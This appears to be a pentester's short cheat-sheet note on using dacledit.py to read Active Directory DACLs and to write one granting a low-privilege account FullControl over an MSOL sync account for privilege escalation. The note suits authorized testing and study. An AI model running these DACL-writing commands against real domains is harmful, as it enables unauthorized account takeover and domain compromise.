# dacledit.py

This helps read/write DACLs!

# Read DACL permissions that a specific principal has on a machine

dacledit.py -action 'read' -principal lowpriv -target 'DC-01$' 'domain.com'/'user':'SecurePa$$!' -debug > dc-01.txt  

TIP

I learned sometimes this query comes up empty, so you can try the more general query below to see ALL DACLs on a target

# Read DACL permissions (general)

See what DACLs are applied to an object:

dacledit.py -action 'read' -target 'DC-01$' 'domain.com'/'user':'SecurePa$$!' -debug > dc-01.txt

# Write DACL changes to privesc

This came in real handy in this tale of pentest pwnage where I had full write access to the MSOL-SYNC-ACCOUNT. I used dacledit.py to grant my LOWPRIV account full access to the MSOL-SYNC-ACCOUNT like so:

The write action made a backup of the DACL by default, but I still made a manual backup first just because I'm paranoid. You know what they say though, right? Two backups are better than no backups!

dacledit.py -action 'write' -rights 'FullControl' -principal lowpriv -target MSOL-SYNC-ACCOUNT -dc-ip 1.2.3.4 